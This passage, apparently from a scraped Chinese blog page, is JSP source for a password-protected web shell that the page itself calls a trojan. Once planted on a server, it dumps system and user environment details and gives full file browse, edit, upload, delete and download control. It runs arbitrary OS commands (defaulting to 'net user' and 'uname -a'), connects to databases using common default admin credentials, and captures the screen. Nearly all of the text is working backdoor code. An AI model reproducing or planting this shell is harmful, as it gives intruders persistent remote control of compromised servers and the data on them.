 904                     String rtnStr = "<div align=\\"center\\"><br><br><font color=\\"red\\">"+orChinese("Wrong Password")+"</font></div>";
 905                     rtnStr += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + request.getRequestURL() + "\\" />";
 906                     out.println(rtnStr);
 907                     out.flush();
 908                     //out.close();
 909                     return;
 910                 }
 911                 session.setAttribute("myPassword", password);
 912             } else {
 913                 password = (String) session.getAttribute("myPassword");
 914             }
 915 
 916             String action = null;
 917             if (request.getParameter("action") == null)
 918                 action = "env";
 919             else
 920                 action = (String) request.getParameter("action");
 921 
 922             if (action.equals("exit")) {
 923                 session.removeAttribute("myPassword");
 924                 response.sendRedirect(request.getRequestURI());
 925                 //out.close();
 926                 return;
 927             }
 928     %>
 929     <form name="actionForm">
 930         <input id="actionOption" type="hidden" name="action" value="Environment" />
 931     </form>
 932     <div style="margin-left: 2px">
 933         <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div>
 934         <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div>
 935         <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div>
 936         <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div>
 937         <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div>
 938         <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div>
 939         <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div>
 940     </div>
 941     <%  if (action.equals("lang")){
 942         language =     request.getParameter("lang");
 943         String oldurl = request.getParameter("oldurl");
 944         if (oldurl!= null){
 945             oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?");
 946         }
 947         String sRet = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />";
 948         %>
 949     <div class="container break-all"><%=sRet %></div>
 950     <%
 951     }else if (action.equals("env")) {
 952     %>
 953     <table class="container break-all onhover">
 954         <tr>
 955             <td width="20%"><%=orChinese("OS") %></td>
 956             <td width="80%"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td>
 957         </tr>
 958         <tr>
 959             <td><%=orChinese("Computer Name") %></td>
 960             <td><%=System.getenv().get("COMPUTERNAME")%></td>
 961         </tr>
 962         <tr>
 963             <td><%=orChinese("Available Processors") %></td>
 964             <td><%=Runtime.getRuntime().availableProcessors() %></td>
 965         </tr>
 966         <tr>
 967             <td><%=orChinese("IP") %></td>
 968             <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td>
 969         </tr>
 970         <tr>
 971             <td><%=orChinese("System Driver") %></td>
 972             <td><%=System.getenv().get("SystemDrive")%></td>
 973         </tr>
 974         <tr>
 975             <td><%=orChinese("Driver Info") %></td>
 976             <td><%=getDriverInfo() %></td>
 977         </tr>
 978         <tr>
 979             <td><%=orChinese("User Name") %></td>
 980             <td><%=System.getenv().get("USERNAME")%></td>
 981         </tr>
 982         <tr>
 983             <td><%=orChinese("User Domain") %></td>
 984             <td><%=System.getenv().get("USERDOMAIN")%></td>
 985         </tr>
 986         <tr>
 987             <td><%=orChinese("User DNS Domain") %></td>
 988             <td><%=System.getenv().get("USERDNSDOMAIN")%></td>
 989         </tr>
 990         <tr>
 991             <td><%=orChinese("User Profile") %></td>
 992             <td><%=System.getenv().get("USERPROFILE")%></td>
 993         </tr>
 994         <tr>
 995             <td><%=orChinese("All User Profile") %></td>
 996             <td><%=System.getenv().get("ALLUSERSPROFILE")%></td>
 997         </tr>
 998         <tr>
 999             <td><%=orChinese("Temp") %></td>
1000             <td><%=System.getenv().get("TEMP")%></td>
1001         </tr>
1002         <tr>
1003             <td><%=orChinese("Program Files") %></td>
1004             <td><%=System.getenv().get("ProgramFiles")%></td>
1005         </tr>
1006         <tr>
1007             <td><%=orChinese("AppData") %></td>
1008             <td><%=System.getenv().get("APPDATA")%></td>
1009         </tr>
1010         <tr>
1011             <td><%=orChinese("System Root") %></td>
1012             <td><%=System.getenv().get("SystemRoot")%></td>
1013         </tr>
1014         <tr>
1015             <td><%=orChinese("Console") %></td>
1016             <td><%=System.getenv().get("ComSpec")%></td>
1017         </tr>
1018         <tr>
1019             <td><%=orChinese("File Executable") %></td>
1020             <td><%=System.getenv().get("PATHEXT")%></td>
1021         </tr>
1022         <tr>
1023             <td><%=orChinese("My Path") %></td>
1024             <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td>
1025         </tr>
1026         <tr>
1027             <td><%=orChinese("User Dir") %></td>
1028             <td><%=System.getProperty("user.dir")%></td>
1029         </tr>
1030         <tr>
1031             <td><%=orChinese("Protocol") %></td>
1032             <td><%=request.getProtocol()%></td>
1033         </tr>
1034         <tr>
1035             <td><%=orChinese("Server Info") %></td>
1036             <td><%=application.getServerInfo()%></td>
1037         </tr>
1038         <tr>
1039             <td><%=orChinese("JDK Version") %></td>
1040             <td><%=System.getProperty("java.version")%></td>
1041         </tr>
1042         <tr>
1043             <td><%=orChinese("JDK Home") %></td>
1044             <td><%=System.getProperty("java.home")%></td>
1045         </tr>
1046         <tr>
1047             <td><%=orChinese("JVM Version") %></td>
1048             <td><%=System.getProperty("java.vm.specification.version")%></td>
1049         </tr>
1050         <tr>
1051             <td><%=orChinese("JVM Name") %></td>
1052             <td><%=System.getProperty("java.vm.name")%></td>
1053         </tr>
1054         <tr>
1055             <td><%=orChinese("Class Path") %></td>
1056             <td><%=System.getProperty("java.class.path")%></td>
1057         </tr>
1058         <tr>
1059             <td><%=orChinese("Java Library Path") %></td>
1060             <td><%=System.getProperty("java.library.path")%></td>
1061         </tr>
1062         <tr>
1063             <td><%=orChinese("Java tmpdir") %></td>
1064             <td><%=System.getProperty("java.io.tmpdir")%></td>
1065         </tr>
1066         <tr>
1067             <td><%=orChinese("Compiler") %></td>
1068             <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
1069         </tr>
1070         <tr>
1071             <td><%=orChinese("Java ext dirs") %></td>
1072             <td><%=System.getProperty("java.ext.dirs")%></td>
1073         </tr>
1074         <tr>
1075             <td><%=orChinese("Remote Addr") %></td>
1076             <td><%=request.getRemoteAddr()%></td>
1077         </tr>
1078         <tr>
1079             <td><%=orChinese("Remote Host") %></td>
1080             <td><%=request.getRemoteHost()%></td>
1081         </tr>
1082         <tr>
1083             <td><%=orChinese("Remote User") %></td>
1084             <td><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
1085         </tr>
1086         <tr>
1087             <td><%=orChinese("Scheme") %></td>
1088             <td><%=request.getScheme()%></td>
1089         </tr>
1090         <tr>
1091             <td><%=orChinese("Secure") %></td>
1092             <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td>
1093         </tr>
1094     </table>
1095     <%
1096         }
1097         if (action.equals("file")) {
1098             String curPath = "";
1099             String result = "";
1100             String fsAction = "";
1101             if (request.getParameter("curPath") == null) {
1102                 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1103                 curPath = pathConvert((new File(curPath)).getParent());
1104             }
1105             else {
1106                 curPath = Unicode2GB((String)request.getParameter("curPath"));
1107                 curPath = pathConvert(curPath);
1108             }
1109             if (request.getParameter("fsAction") == null) {
1110                 fsAction = "list";
1111             } else {
1112                 fsAction = (String)request.getParameter("fsAction");
1113             }
1114             if (fsAction.equals("list")){
1115             %>
1116     <div class="container">
1117         <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>">
1118             <div align="left">
1119 
1120                 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>"
1121                     class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans"
1122                     onclick="javascript:document.getElementById(‘file_system‘).click();" />
1123                 <% 
1124                 String os = System.getProperties().getProperty("os.name");
1125                 if (os.toUpperCase().contains("WIN")){
1126                     File[] files = File.listRoots();
1127                     for(int i = 0; i < files.length; i++) {
1128                            %>
1129                 <input type="button" class="trans"
1130                     onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\\\", "/")%>‘"
1131                     value="<%= files[i]%>" />
1132                 <%
1133                     }
1134                 }
1135                 %>
1136 
1137             </div>
1138             <table class="onhover" style="width: 100%">
1139                 <tr>
1140                     <td align="center"><%=orChinese("File Name") %></td>
1141                     <td align="center" width="10%"><%=orChinese("Size") %></td>
1142                     <td align="center" width="38%"><%=orChinese("Operation") %></td>
1143                 </tr>
1144                 <tr>
1145                     <%
1146                     File curFolder = new File(curPath);
1147                 %>
1148                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td>
1149                     <td align="right"></td>
1150                     <td></td>
1151                 </tr>
1152                 <% 
1153                 for (File file : this.getFolderList(curPath)){
1154                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1155                     f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download);
1156                     %>
1157                 <tr>
1158                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>]
1159                     </a></td>
1160                     <td align="right"><%=f.getLength() %></td>
1161                     <td><%=f.getHtmlOperation() %></td>
1162                 </tr>
1163                 <%
1164                 }
1165                 for (File file : this.getFileList(curPath)){
1166                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1167                     f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download);
1168                     %>
1169                 <tr>
1170                     <td><%=f.getName() %></td>
1171                     <td align="right"><%=f.getLength() %></td>
1172                     <td><%=f.getHtmlOperation() %></td>
1173                 </tr>
1174                 <%
1175                 }
1176                 %>
1177             </table>
1178             <div align="left">
1179                 <table style="width: 100%;">
1180                     <tr>
1181                         <td align="left" style="border: 0">
1182                             <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" /> 
1183                             <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()"> 
1184                             <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" />
1185                         </td>
1186                         <td align="right" style="border: 0">
1187                             <input type="text" id="createFileName" class="trans" size="26" name="fileName" /> 
1188                             <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘>
1189                             <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘>
1190                         </td>
1191                     </tr>
1192                 </table>
1193             </div>
1194         </form>
1195         <div align="left">
1196             <form id="uploadform" name="upload" enctype="multipart/form-data" method="post"
1197                 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>">
1198                 <input type="file" style="display: none" name="upFile" id="fileSelect"
1199                     onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" />
1200             </form>
1201         </div>
1202     </div>
1203 
1204     <%
1205             }else if (fsAction.equals("Edit")){
1206                 if (request.getParameter("fileName") == null) {
1207                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1208                 } else {
1209                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1210                     result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action);
1211                 }
1212             }else if (fsAction.equals("save")) {
1213                  if (request.getParameter("fileContent") == null) {
1214                     result = "<font color=\\"red\\">"+orChinese("Content is null")+"</font>";
1215                 } else {
1216                     if (request.getParameter("fileName") == null) {
1217                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1218                     } else {
1219                         String fileName = Unicode2GB(request.getParameter("fileName").trim());
1220                         String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
1221                         result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent);
1222                     }
1223                 }
1224             } else if (fsAction.equals("createFolder")) {
1225                 if (request.getParameter("fileName") == null) {
1226                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1227                 } else {
1228                     String folderName = Unicode2GB(request.getParameter("fileName").trim());
1229                     if (folderName.equals("")) {
1230                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1231                     } else {
1232                         result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action);
1233                     }
1234                 } 
1235             } else if (fsAction.equals("createFile")) {
1236                  if (request.getParameter("fileName") == null) {
1237                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>";
1238                 } else {
1239                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1240                     if (fileName.equals("")) {
1241                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>";
1242                     } else {
1243                         result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1244                     }
1245                 }
1246             } else if (fsAction.equals("Delete")) {
1247                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1248                 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1249             } else if (fsAction.equals("upload")) {
1250                 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
1251             } else if (fsAction.equals("Rename")) {
1252                 String newName = Unicode2GB(request.getParameter("newName").trim());
1253                 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1254                 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action);
1255             } else if (fsAction.equals("Download")) {
1256                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1257                 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response);
1258             }
1259             %>
1260     <div class="container">
1261         <font color="red"><%=result %></font>
1262     </div>
1263     <%
1264         }
1265         if (action.equals("search")) {
1266             String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1267             curPath = pathConvert((new File(curPath)).getParent());
1268             
1269             String searchpath = Unicode2GB(request.getParameter("searchpath"));
1270             if (searchpath == null || searchpath.trim().length() == 0){
1271                 searchpath = curPath;
1272             }
1273             String searchsubfix = Unicode2GB(request.getParameter("searchsubfix"));
1274             if (searchsubfix == null || searchsubfix.trim().length() == 0){
1275                 searchsubfix = ".jsp .html .htm";
1276             }
1277             String searchby = request.getParameter("searchby");
1278             String ignorecase = request.getParameter("ignorecase");
1279             String searchcontent = Unicode2GB(request.getParameter("searchcontent"));
1280             if (searchcontent == null || searchcontent.trim().length() == 0){
1281                 searchcontent = "index";
1282             }
1283             String fsAction = request.getParameter("fsAction");
1284             String searchResult = "";
1285             if (fsAction != null){
1286                 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase));
1287             }
1288     %>
1289     <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>">
1290         <table>
1291             <tr>
1292                 <td width="260px" align="right"><%=orChinese("Search from") %>:</td>
1293                 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td>
1294             </tr>
1295             <tr>
1296                 <td align="right"><%=orChinese("Search for file type") %>:</td>
1297                 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td>
1298             </tr>
1299             <tr>
1300                 <td align="right"><%=orChinese("Setting") %>:</td>
1301                 <td>
1302                     <%
1303                     if ("content".equals(searchby)){
1304                         %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by Name") %> <input type="radio" name="searchby"
1305                     class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <%
1306                     }else{
1307                         %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio"
1308                     name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <%
1309                     }
1310                     if ("yes".equals(ignorecase)){
1311                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <%
1312                     }else{
1313                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <%
1314                     }
1315                     %>
1316                 </td>
1317             </tr>
1318             <tr>
1319                 <td align="right"><%=orChinese("Search keyword") %>:</td>
1320                 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit"
1321                     value="<%=orChinese("Search") %>" class="trans" /></td>
1322             </tr>
1323             <tr>
1324                 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td>
1325             </tr>
1326         </table>
1327     </form>
1328     <%
1329         }
1330         if (action.equals("command")) {
1331             String cmd = "";
1332             InputStream ins = null;
1333             String result = "";
1334             
1335             if (request.getParameter("command") != null) {        
1336                 cmd = (String)request.getParameter("command");
1337                 result = exeCmd(cmd);
1338             }
1339     %>
1340     <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>">
1341         <%
1342         if (cmd==null || "".equals(cmd.trim())){
1343             if (System.getProperty("os.name").toLowerCase().contains("windows")){
1344                 cmd = "cmd.exe /c net user";
1345             }else{
1346                 cmd = "uname -a";
1347             }
1348         }
1349     %>
1350         <div align="left">
1351             <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans"
1352                 value="<%=orChinese("Execute") %>" />
1353         </div>
1354         <table style="width: 100%; height: 100px">
1355             <tr>
1356                 <td><%=result == "" ? "&nbsp;" : result%></td>
1357             </tr>
1358         </table>
1359     </form>
1360     <% 
1361         } 
1362         if (action.equals("database")) { 
1363             String SQLResult = "";
1364             String dbType = request.getParameter("dbType");
1365             dbType = dbType == null?"mysql":dbType;
1366             String driver = request.getParameter("driver");
1367             String port = request.getParameter("port");
1368             String dbname = Unicode2GB(request.getParameter("dbname"));
1369             String host = Unicode2GB(request.getParameter("host"));
1370             String sql = Unicode2GB(request.getParameter("sql"));
1371             String dbuser = Unicode2GB(request.getParameter("dbuser"));
1372             String dbpass = Unicode2GB(request.getParameter("dbpass"));
1373             String fsAction = request.getParameter("fsAction");
1374             String connurl = Unicode2GB(request.getParameter("connurl"));
1375             if (sql==null) sql="";
1376             if (fsAction == null || "typeChange".equals(fsAction)){
1377                 if ("Mysql".equalsIgnoreCase(dbType)){
1378                     driver = "com.mysql.jdbc.Driver";
1379                     port = "3306";
1380                     dbuser = "root";
1381                     dbpass = "root";
1382                     host = "localhost";
1383                     dbname = "mysql";
1384                 }else if("Oracle".equalsIgnoreCase(dbType)){
1385                     driver = "oracle.jdbc.driver.OracleDriver";
1386                     port = "1521";
1387                     dbuser = "scott";
1388                     dbpass = "tiger";
1389                     host = "localhost";
1390                     dbname = "orcl";
1391                 }else if("SQLServer".equalsIgnoreCase(dbType)){
1392                     driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
1393                     port = "1433";
1394                     dbuser = "sa";
1395                     dbpass = "123456";
1396                     host = "localhost";
1397                     dbname = "master";
1398                 }else if("DB2".equalsIgnoreCase(dbType)){
1399                     driver = "com.ibm.db2.jdbc.app.DB2Driver";
1400                     port = "5000";
1401                     dbuser = "db2admin";
1402                     dbpass = "123456";
1403                     host = "localhost";
1404                     dbname = "";
1405                 }else if("Other".equalsIgnoreCase(dbType)){
1406                     driver = "sun.jdbc.odbc.JdbcOdbcDriver";
1407                     connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password";
1408                     dbuser = "";
1409                     dbpass = "";
1410                 }
1411             }else if("connect".equals(fsAction)){
1412                 if (driver!=null){
1413                     Class.forName(driver);
1414                     if ("Mysql".equalsIgnoreCase(dbType)){
1415                         connurl = "jdbc:mysql://localhost:"+port+"/" + dbname;
1416                     }else if("Oracle".equalsIgnoreCase(dbType)){
1417                         connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname;
1418                     }else if("SQLServer".equalsIgnoreCase(dbType)){
1419                         connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname;
1420                     }else if("DB2".equalsIgnoreCase(dbType)){
1421                         connurl = "jdbc:db2://localhost:"+port+"/" + dbname;
1422                     }
1423                     SQLResult = this.DBConnect(connurl, dbuser, dbpass);
1424                 }
1425             }else if("disconnect".equals(fsAction)){
1426                 try {
1427                     if (dbStatement != null) {
1428                         dbStatement.close();
1429                         dbStatement = null;
1430                     }
1431                     if (conn != null) {
1432                         conn.close();
1433                         conn = null;
1434                     }
1435                 } catch (SQLException e) {
1436                 
1437                 }
1438             }else if("execute".equals(fsAction)){
1439                 SQLResult = DBExecute(sql);
1440             }
1441     %>
1442     <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>">
1443         <table style="width: 100%;">
1444             <tr>
1445                 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td>
1446                 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white"
1447                     onchange="dbsubmit(‘typeChange‘)">
1448                         <%
1449                         if ("Mysql".equalsIgnoreCase(dbType)){
1450                             %>
1451                         <option value="Mysql" selected="selected">Mysql</option>
1452                         <option value="Oracle">Oracle</option>
1453                         <option value="SQLServer">SQLServer</option>
1454                         <option value="DB2">DB2</option>
1455                         <option value="Other">Other</option>
1456                         <%
1457                         }else if("Oracle".equalsIgnoreCase(dbType)){
1458                             %>
1459                         <option value="Mysql">Mysql</option>
1460                         <option value="Oracle" selected="selected">Oracle</option>
1461                         <option value="SQLServer">SQLServer</option>
1462                         <option value="DB2">DB2</option>
1463                         <option value="Other">Other</option>
1464                         <%
1465                         }else if("DB2".equalsIgnoreCase(dbType)){
1466                             %>
1467                         <option value="Mysql">Mysql</option>
1468                         <option value="Oracle">Oracle</option>
1469                         <option value="SQLServer">SQLServer</option>
1470                         <option value="DB2" selected="selected">DB2</option>
1471                         <option value="Other">Other</option>
1472                         <%
1473                         }else if("SQLServer".equalsIgnoreCase(dbType)){
1474                             %>
1475                         <option value="Mysql">Mysql</option>
1476                         <option value="Oracle">Oracle</option>
1477                         <option value="SQLServer" selected="selected">SQLServer</option>
1478                         <option value="DB2">DB2</option>
1479                         <option value="Other">Other</option>
1480                         <%
1481                         }else if("Other".equalsIgnoreCase(dbType)){
1482                             %>
1483                         <option value="Mysql">Mysql</option>
1484                         <option value="Oracle">Oracle</option>
1485                         <option value="SQLServer">SQLServer</option>
1486                         <option value="DB2">DB2</option>
1487                         <option value="Other" selected="selected">Other</option>
1488                         <%
1489                         }
1490                         %>
1491                 </select></td>
1492             </tr>
1493 
1494             <tr>
1495                 <td align="right"><%=orChinese("Driver") %>:</td>
1496                 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td>
1497             </tr>
1498             <%
1499             if ("Other".equalsIgnoreCase(dbType)){
1500                 %>
1501             <tr>
1502                 <td align="right"><%=orChinese("Connect URL") %>:</td>
1503                 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td>
1504             </tr>
1505             <%
1506             }else{
1507                 %>
1508             <tr>
1509                 <td align="right"><%=orChinese("Host") %>:</td>
1510                 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td>
1511             </tr>
1512             <tr>
1513                 <td align="right"><%=orChinese("Port") %>:</td>
1514                 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td>
1515             </tr>
1516             <tr>
1517                 <td align="right"><%=orChinese("DB Name") %>:</td>
1518                 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td>
1519             </tr>
1520             <%
1521             }
1522             %>
1523             <tr>
1524                 <td align="right"><%=orChinese("Username") %>:</td>
1525                 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td>
1526             </tr>
1527             <tr>
1528                 <td align="right"><%=orChinese("Password") %>:</td>
1529                 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td>
1530             </tr>
1531             <tr>
1532                 <td align="right"><%=orChinese("Connect") %>:</td>
1533                 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button"
1534                     class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td>
1535             </tr>
1536             <tr>
1537                 <td align="right"><%=orChinese("SQL") %>:</td>
1538                 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans"
1539                     value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td>
1540             </tr>
1541             <tr height="50">
1542                 <td colspan="2"><%=SQLResult %></td>
1543             <tr />
1544         </table>
1545     </form>
1546     <%}
1547     if (action.equals("screen")){
1548         %>
1549         <div class="container" align="left">
1550             <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" /> 
1551             <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" />
1552         </div>
1553         <%
1554     }
1555     if (action.equals("getscreen")){
1556         out.clear();  
1557         out = pageContext.pushBody();
1558         this.getScreenImg(request, response);
1559     }
1560     %>
1561     <%}%>
1562     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a>&nbsp;
1563     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">&#20013;&#25991;</a>
1564 </body>
1565 </html>

截图:

技术分享

技术分享

以上是关于漂亮的JSP木马的主要内容,如果未能解决你的问题,请参考以下文章

如何使用JSP一句话木马和菜刀木马

谷歌浏览器调试jsp 引入代码片段,如何调试代码片段中的js

在 JSP 中的 <% %> 代码片段中添加链接

更漂亮的东西弄乱了 jsx 片段

python python中的漂亮(或漂亮打印)JSON对象具有这一功能。在尝试了解什么时,我总是使用这个片段

JSP基础